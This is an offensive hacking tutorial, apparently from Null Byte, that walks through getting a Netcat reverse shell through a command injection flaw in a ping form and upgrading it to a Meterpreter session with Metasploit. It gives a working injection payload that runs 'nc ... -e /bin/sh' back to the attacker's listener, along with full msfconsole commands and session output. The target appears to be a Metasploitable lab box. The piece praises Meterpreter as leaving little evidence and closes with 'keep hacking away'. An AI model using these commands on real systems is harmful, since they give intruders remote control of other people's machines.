How to Elevate a Netcat Shell to a Meterpreter Session for More Power & Control

Feb 15, 2019 11:08 PM

Popping a shell is often the main goal of a hacker, and it can be exciting when executed properly, but sometimes they do have their limitations. Metasploit's Meterpreter probably needs no introduction, but this powerful, dynamic payload can offer a leg up over normal shells. To prove it, we'll show how to take a normal command shell and elevate it to a Meterpreter session.

Shell vs. Meterpreter

A shell is basically an interface that acts as a shortcut to the commands of an operating system. When it comes to hacking, there are two types of shells that are mainly talked about: bind shells and reverse shells.

A bind shell effectively binds itself to a certain port on the target, and the attacking system connects to that listening port and a session is created. A reverse shell, on the other hand, actively connects from the target machine to the attacking machine, where a listener is waiting for incoming connections.

Command shells provide a great way to really dig into the target, but they are not always the best option. Usually, they are constrained to the privileges of the user who initiated the shell, so the power that comes with root-level access isn't always available.

Meterpreter allows us to run post-exploitation modules and privilege escalation exploits locally on the target. It utilizes encrypted communication methods and nothing is written to disk during operation, making it a suitable weapon that leaves little to no evidence behind. Meterpreter offers a ton of other features and is highly extensible, which makes it an excellent addition to any hacker's arsenal.

Step 1: Start a Listener

To get started, fire up Metasploit. Type msfconsole in the terminal and we'll be greeted by a nice little welcome banner after it loads. We'll be using a great feature of Metasploit, which is the ability to set up a universal listener that can handle a wide range of different types of shells. Enter the following to load the module:

use exploit/multi/handler

Next, we need to specify the listening host and port, using the IP address of our local machine and an arbitrary port number. We also need to set the payload — the versatile reverse TCP shell is an excellent choice here.

msf5 exploit(multi/handler) > set lhost 172.16.1.100
lhost => 172.16.1.100
msf5 exploit(multi/handler) > set lport 1234
lport => 1234
msf5 exploit(multi/handler) > set payload linux/x86/shell/reverse_tcp
payload => linux/x86/shell/reverse_tcp

Type options at the prompt to verify that our settings are correct.

msf5 exploit(multi/handler) > options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Payload options (linux/x86/shell/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.16.1.100     yes       The listen address (an interface may be specified)
   LPORT  1234             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

It looks like we're good to go. Type run to launch the handler, and it's now ready and waiting for an incoming connection.

msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 172.16.1.100:1234

Step 2: Get Shell with Netcat

Netcat is a powerful networking utility commonly used to troubleshoot connectivity issues, but it can also be utilized as a backdoor via command shells. We can use this tool, coupled with a command injection vulnerability, to spawn a shell and connect back to our local machine. If all goes well, the handler that we set up earlier will catch the shell and we'll be able to issue commands.

This vulnerability lets us append system commands to the input for the ping utility.

127.0.0.1 && nc 172.16.1.100 1234 -e /bin/sh

Here, we've tacked on the Netcat command to spawn a shell and connect to our local machine on port 1234:

636845341524501638.jpg

After a moment, back in the terminal with our handler, we see that a session is opened up. We can now issue commands like id and uname -a to verify this.

[*] Sending stage (36 bytes) to 172.16.1.102
[*] Command shell session 1 opened (172.16.1.100:1234 -> 172.16.1.102:53462) at 2019-01-29 15:28:28 -0600

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

Finally, we need to background this session by pressing Ctrl-Z, followed by Y to confirm.

^Z
Background session 1? [y/N]  y
msf5 exploit(multi/handler) >

Step 3: Elevate Shell to Meterpreter Session

Now that we have attained a session on the target, we can upgrade that humble shell to a full-fledged Meterpreter session. This will allow for greater flexibility when it comes to interacting with the target.

In order to view any sessions that are currently open, type sessions at the prompt. Below, we can see the session we opened earlier, along with its ID, shell type, and connection information.

msf5 exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type             Information  Connection
  --  ----  ----             -----------  ----------
  1         shell x86/linux               172.16.1.100:1234 -> 172.16.1.102:53462 (172.16.1.102)

The easiest way to transform a regular session into a Meterpreter session is to use the -u flag. Issue the sessions command with the appropriate ID and watch the magic happen.

msf5 exploit(multi/handler) > sessions -u 1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]

[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 172.16.1.100:4433
[*] Sending stage (914728 bytes) to 172.16.1.102
[*] Meterpreter session 2 opened (172.16.1.100:4433 -> 172.16.1.102:42790) at 2019-01-29 15:30:28 -0600
[*] Command stager progress: 100.00% (773/773 bytes)

Now it seems like nothing really happened, but in fact, we've opened a Meterpreter session in the background — it doesn't automatically drop us into it. If we issue the sessions command again, it will list our new Meterpreter session with an ID of 2. We can then use the -i flag to interact with it.

msf5 exploit(multi/handler) > sessions -i 2
[*] Starting interaction with 2...

meterpreter >

And now we have a Meterpreter shell. However, there is one other way to elevate a normal shell to a Meterpreter session that is similar to the method outlined above, and that is to manually use the shell_to_meterpreter post-exploitation module.

Alternative Way to Elevate Shell to Meterpreter Session

To load it, type the following.

use post/multi/manage/shell_to_meterpreter

All we have to do is specify the existing session we want to upgrade. After that, just to be sure, we can view the current settings with the options command.

msf5 post(multi/manage/shell_to_meterpreter) > set session 1
session => 1
msf5 post(multi/manage/shell_to_meterpreter) > options

Module options (post/multi/manage/shell_to_meterpreter):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   HANDLER  true             yes       Start an exploit/multi/handler to receive the connection
   LHOST                     no        IP of host that will receive the connection from the payload (Will try to auto detect).
   LPORT    4433             yes       Port for payload to connect to.
   SESSION  1                yes       The session to run this module on.

Type run to kick it off.

msf5 post(multi/manage/shell_to_meterpreter) > run

[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 172.16.1.100:4433
[*] Sending stage (914728 bytes) to 172.16.1.102
[*] Meterpreter session 3 opened (172.16.1.100:4433 -> 172.16.1.102:59832) at 2019-01-29 15:34:16 -0600
[*] Command stager progress: 100.00% (773/773 bytes)
[*] Post module execution completed

Again, this opens up the new session in the background, so we have to issue the sessions command to determine the correct ID.

msf5 post(multi/manage/shell_to_meterpreter) > sessions

Active sessions
===============

  Id  Name  Type                   Information  Connection
  --  ----  ----                   -----------  ----------
  1         shell x86/linux                     172.16.1.100:1234 -> 172.16.1.102:53462 (172.16.1.102)
  3         meterpreter x86/linux               172.16.1.100:4433 -> 172.16.1.102:59832 (172.16.1.102)

We can see that this new Meterpreter session has an ID of 3. Now we are ready to interact with it.

msf5 post(multi/manage/shell_to_meterpreter) > sessions -i 3
[*] Starting interaction with 3...

meterpreter >

We now have a Meterpreter shell, and from here, the sky is the limit.

Wrapping Thing's Up

In this tutorial, we learned how to take a regular old command shell and elevate it to Meterpreter status. We used a Netcat shell here, but any other type of shell should work with this method. Meterpreter offers a great deal of power and control over any target, so get out there and keep hacking away.

Cover image by StockSnap/Pixabay; Screenshots by drd_/Null Byte

Comments

No Comments Exist

Be the first, drop a comment!